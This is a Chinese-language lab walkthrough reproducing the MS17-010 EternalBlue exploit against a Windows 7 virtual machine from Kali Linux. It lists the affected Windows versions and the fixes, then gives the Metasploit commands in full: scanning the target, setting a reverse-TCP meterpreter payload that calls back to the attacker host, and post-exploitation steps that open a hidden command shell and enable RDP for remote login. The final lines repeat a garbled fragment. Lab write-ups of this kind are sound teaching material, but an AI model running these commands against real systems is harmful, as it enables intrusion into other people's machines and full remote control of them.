MS17-010永恒之蓝复现
漏洞危害
恶意代码可以利用445端口,对受害主机进行以下操作
1.远程代码执行。攻击者可利用该漏洞远程控制受害者的电脑。
2.永恒之蓝勒索病毒以及各种变种病毒。
出现的版本
Windows XP SP3
Windows 2003 SP2
Windows Vista
Windows Server 2008
Windows 7 SP1/Windows Server 2008 R2
Windows 8.1
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows 10
Windows 10 1511
Windows 10 1607
修复方法
1、下载补丁
2、关闭445、135、137、138、139危险端口
实验目的
学习永恒之蓝的全过程,完成对永恒之蓝的复现和利用。
实验工具以及准备
Windows 7 x64 IP:192.168.174.131
kali linux 2019.03版 IP:192.168.174.130
最新版的metasploit
关闭win7的防火墙,打开445端口
实验过程
① 用kali终端输入命令msfconsole打开metasploit
② 查询msf中的漏洞:search ms17-010
③ 扫描靶机是否存在漏洞
use auxiliary/scanner/smb/smb_ms17_010(使用扫描模块)
show options(查看选项)
set rhosts 192.168.174.131 (设置靶机的IP)
exploit(利用)
扫描结束提示主机可能存在漏洞,接下来就可以利用了
④ 攻击模块并配置参数
use exploit/windows/smb/ms17_010_eternalblue(加载攻击模块)
set payload windows/x64/meterpreter/reverse_tcp(设置payload)
show options(查看选项)
set rhost 192.168.174.131 (设置靶机的IP)
set lhost 192.168.174.130 (设置发起攻击的主机IP)
set lport 443 (反弹shell)
启动
完成对永恒之蓝的利用,如果还需要执行其他操作的话,就是后渗透
后渗透
查看网络配置ipconfig
执行系统命令execute -H -i -f cmd.exe
开启3389远程连接:run getgui -e
进行远程连接
rdesktop -u 账号 -p 密码 meterpreter 192.168.174.131:3389
gui -e
进行远程连接
rdesktop -u 账号 -p 密码 meterpreter 192.168.174.131:3389